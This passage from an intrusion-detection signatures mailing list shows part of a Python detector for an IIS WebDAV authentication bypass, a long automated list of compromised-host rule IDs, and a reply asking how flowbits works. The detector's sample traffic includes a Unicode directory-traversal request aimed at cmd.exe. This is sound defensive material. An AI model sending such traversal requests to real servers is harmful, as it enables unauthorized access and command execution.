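        ("to_client", b"HTTP/1.1 401 Unauthorized\r\n\r\n"),
    ],
    # %c0%af without Translate: f, as a generic traversal scanner would send it.
    "198.51.100.7:5555->192.0.2.10:80": [
        ("to_server", b"GET /scripts/..%c0%af../winnt/system32/cmd.exe HTTP/1.0\r\n\r\n"),
        ("to_client", b"HTTP/1.1 404 Not Found\r\n\r\n"),
    ],
    # Translate: f on an ordinary URI (normal WebDAV client behaviour): silent.
    "10.0.0.9:41003->192.0.2.10:80": [
        ("to_server", b"GET /index.html HTTP/1.1\r\nHost: 192.0.2.10\r\nTranslate: f\r\n\r\n"),
        ("to_client", b"HTTP/1.1 200 OK\r\n\r\n"),
    ],
}

if __name__ == "__main__":
    for a in run(SAMPLE_FLOWS):
        print(f"[priority {a.priority}] {a.flow} {a.msg}")
```

Run it directly to print the alerts for the four sample flows; only the first flow produces the priority-1 "successful" alert. On a sensor the same split is a request rule with flowbits:set (and no noalert, so attempts are still visible) and a response rule with flowbits:isset that matches the 200 status line, which is what dxp proposes; note that Snort keeps a set flowbit for the rest of the session unless a rule unsets it, so a keep-alive connection needs the same care the example takes in inspect_response.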
From emerging at emergingthreats.net Sun May 17 16:00:11 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Sun, 17 May 2009 16:00:11 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090517200011.3AE734504B@goliath.jonkmans.com>

[***] Results from Oinkmaster started Sun May 17 16:00:11 2009 [***]

[*] Rules modifications: [*]
None.

[+++] Added non-rule lines: [+++]

-> Added to emerging-sid-msg.map (100):
2500081 || ET COMPROMISED Known Compromised or Hostile Host Traffic (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500082 || ET COMPROMISED Known Compromised or Hostile Host Traffic (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500083 || ET COMPROMISED Known Compromised or Hostile Host Traffic (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500084 || ET COMPROMISED Known Compromised or Hostile Host Traffic (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500085 || ET COMPROMISED Known Compromised or Hostile Host Traffic (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500086 || ET COMPROMISED Known Compromised or Hostile Host Traffic (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500087 || ET COMPROMISED Known Compromised or Hostile Host Traffic (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500088 || ET COMPROMISED Known Compromised or Hostile Host Traffic (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500089 || ET COMPROMISED Known Compromised or Hostile Host Traffic (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500090 || ET COMPROMISED Known Compromised or Hostile Host Traffic (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500091 || ET COMPROMISED Known Compromised or Hostile Host Traffic (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500092 || ET COMPROMISED Known Compromised or Hostile Host Traffic (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500093 || ET COMPROMISED Known Compromised or Hostile Host Traffic (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500094 || ET COMPROMISED Known Compromised or Hostile Host Traffic (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500095 || ET COMPROMISED Known Compromised or Hostile Host Traffic (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500096 || ET COMPROMISED Known Compromised or Hostile Host Traffic (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500097 || ET COMPROMISED Known Compromised or Hostile Host Traffic (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500098 || ET COMPROMISED Known Compromised or Hostile Host Traffic (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500099 || ET COMPROMISED Known Compromised or Hostile Host Traffic (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500100 || ET COMPROMISED Known Compromised or Hostile Host Traffic (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500101 || ET COMPROMISED Known Compromised or Hostile Host Traffic (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500102 || ET COMPROMISED Known Compromised or Hostile Host Traffic (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500103 || ET COMPROMISED Known Compromised or Hostile Host Traffic (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500104 || ET COMPROMISED Known Compromised or Hostile Host Traffic (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500105 || ET COMPROMISED Known Compromised or Hostile Host Traffic (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500106 || ET COMPROMISED Known Compromised or Hostile Host Traffic (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500107 || ET COMPROMISED Known Compromised or Hostile Host Traffic (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500108 || ET COMPROMISED Known Compromised or Hostile Host Traffic (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500109 || ET COMPROMISED Known Compromised or Hostile Host Traffic (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500110 || ET COMPROMISED Known Compromised or Hostile Host Traffic (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500111 || ET COMPROMISED Known Compromised or Hostile Host Traffic (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500112 || ET COMPROMISED Known Compromised or Hostile Host Traffic (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500113 || ET COMPROMISED Known Compromised or Hostile Host Traffic (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500114 || ET COMPROMISED Known Compromised or Hostile Host Traffic (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500115 || ET COMPROMISED Known Compromised or Hostile Host Traffic (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500116 || ET COMPROMISED Known Compromised or Hostile Host Traffic (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500117 || ET COMPROMISED Known Compromised or Hostile Host Traffic (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500118 || ET COMPROMISED Known Compromised or Hostile Host Traffic (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500119 || ET COMPROMISED Known Compromised or Hostile Host Traffic (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500120 || ET COMPROMISED Known Compromised or Hostile Host Traffic (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500121 || ET COMPROMISED Known Compromised or Hostile Host Traffic (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500122 || ET COMPROMISED Known Compromised or Hostile Host Traffic (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500123 || ET COMPROMISED Known Compromised or Hostile Host Traffic (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500124 || ET COMPROMISED Known Compromised or Hostile Host Traffic (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500125 || ET COMPROMISED Known Compromised or Hostile Host Traffic (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500126 || ET COMPROMISED Known Compromised or Hostile Host Traffic (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500127 || ET COMPROMISED Known Compromised or Hostile Host Traffic (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500128 || ET COMPROMISED Known Compromised or Hostile Host Traffic (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500129 || ET COMPROMISED Known Compromised or Hostile Host Traffic (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2500130 || ET COMPROMISED Known Compromised or Hostile Host Traffic (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510081 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510082 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510083 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510084 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510085 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510086 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510087 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510088 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510089 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510090 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510091 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510092 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510093 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510094 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510095 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510096 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510097 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510098 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510099 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510100 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510101 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510102 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510103 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510104 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510105 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510106 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510107 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510108 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510109 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
2510110 || ET COMPROMISED Known
Compromised or Hostile Host Traffic - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510111 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510112 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510113 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510114 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510115 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510116 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510117 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510118 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510119 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510120 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510121 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510122 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510123 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (124) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510124 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510125 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510126 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510127 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510128 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510129 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510130 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts -> Added to emerging-sid-msg.map.txt (100): 2500081 || ET COMPROMISED Known Compromised or Hostile Host Traffic (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500082 || ET COMPROMISED Known Compromised or Hostile Host Traffic (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500083 || ET COMPROMISED Known Compromised or Hostile Host Traffic (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500084 || ET COMPROMISED Known Compromised or Hostile Host Traffic (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500085 || ET COMPROMISED Known Compromised or Hostile Host Traffic (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500086 || ET COMPROMISED Known Compromised or Hostile Host Traffic (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500087 || ET COMPROMISED Known Compromised or Hostile 
Host Traffic (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500088 || ET COMPROMISED Known Compromised or Hostile Host Traffic (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500089 || ET COMPROMISED Known Compromised or Hostile Host Traffic (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500090 || ET COMPROMISED Known Compromised or Hostile Host Traffic (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500091 || ET COMPROMISED Known Compromised or Hostile Host Traffic (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500092 || ET COMPROMISED Known Compromised or Hostile Host Traffic (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500093 || ET COMPROMISED Known Compromised or Hostile Host Traffic (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500094 || ET COMPROMISED Known Compromised or Hostile Host Traffic (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500095 || ET COMPROMISED Known Compromised or Hostile Host Traffic (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500096 || ET COMPROMISED Known Compromised or Hostile Host Traffic (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500097 || ET COMPROMISED Known Compromised or Hostile Host Traffic (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500098 || ET COMPROMISED Known Compromised or Hostile Host Traffic (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500099 || ET COMPROMISED Known Compromised or Hostile Host Traffic (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500100 || ET COMPROMISED Known Compromised or Hostile Host Traffic (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500101 || ET COMPROMISED Known Compromised or Hostile Host Traffic (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500102 || ET COMPROMISED 
Known Compromised or Hostile Host Traffic (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500103 || ET COMPROMISED Known Compromised or Hostile Host Traffic (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500104 || ET COMPROMISED Known Compromised or Hostile Host Traffic (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500105 || ET COMPROMISED Known Compromised or Hostile Host Traffic (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500106 || ET COMPROMISED Known Compromised or Hostile Host Traffic (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500107 || ET COMPROMISED Known Compromised or Hostile Host Traffic (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500108 || ET COMPROMISED Known Compromised or Hostile Host Traffic (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500109 || ET COMPROMISED Known Compromised or Hostile Host Traffic (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500110 || ET COMPROMISED Known Compromised or Hostile Host Traffic (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500111 || ET COMPROMISED Known Compromised or Hostile Host Traffic (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500112 || ET COMPROMISED Known Compromised or Hostile Host Traffic (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500113 || ET COMPROMISED Known Compromised or Hostile Host Traffic (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500114 || ET COMPROMISED Known Compromised or Hostile Host Traffic (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500115 || ET COMPROMISED Known Compromised or Hostile Host Traffic (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500116 || ET COMPROMISED Known Compromised or Hostile Host Traffic (117) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500117 || ET COMPROMISED Known Compromised or Hostile Host Traffic (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500118 || ET COMPROMISED Known Compromised or Hostile Host Traffic (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500119 || ET COMPROMISED Known Compromised or Hostile Host Traffic (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500120 || ET COMPROMISED Known Compromised or Hostile Host Traffic (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500121 || ET COMPROMISED Known Compromised or Hostile Host Traffic (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500122 || ET COMPROMISED Known Compromised or Hostile Host Traffic (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500123 || ET COMPROMISED Known Compromised or Hostile Host Traffic (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500124 || ET COMPROMISED Known Compromised or Hostile Host Traffic (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500125 || ET COMPROMISED Known Compromised or Hostile Host Traffic (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500126 || ET COMPROMISED Known Compromised or Hostile Host Traffic (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500127 || ET COMPROMISED Known Compromised or Hostile Host Traffic (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500128 || ET COMPROMISED Known Compromised or Hostile Host Traffic (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500129 || ET COMPROMISED Known Compromised or Hostile Host Traffic (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500130 || ET COMPROMISED Known Compromised or Hostile Host Traffic (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510081 || ET COMPROMISED Known 
Compromised or Hostile Host Traffic - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510082 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510083 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510084 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510085 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510086 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510087 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510088 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510089 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510090 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510091 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510092 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510093 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510094 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (95) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510095 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510096 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510097 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510098 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510099 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510100 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510101 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510102 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510103 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510104 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510105 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510106 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510107 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510108 || ET COMPROMISED Known 
Compromised or Hostile Host Traffic - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510109 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510110 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510111 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510112 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510113 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510114 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510115 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510116 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510117 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510118 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510119 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510120 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510121 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (122) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510122 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510123 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510124 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510125 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510126 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510127 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510128 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510129 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510130 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

From wolvee.x at gmail.com Mon May 18 01:16:52 2009
From: wolvee.x at gmail.com (Wolvee)
Date: Mon, 18 May 2009 10:46:52 +0530
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To:
References:
Message-ID: <4A10EF44.6060301@gmail.com>

Hi All,

Can someone please tell me about the flowbits keyword in the rule and what the performance is if we use it in the rule??

>
> That's a good idea. However, I think there may be a need for some to
> see alerts on attempts. So, adding a flowbits in the first rule is good
